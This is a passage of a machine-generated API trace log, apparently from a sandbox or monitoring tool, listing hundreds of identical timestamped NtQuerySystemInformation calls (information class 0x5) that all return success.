SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.375] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0235.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, 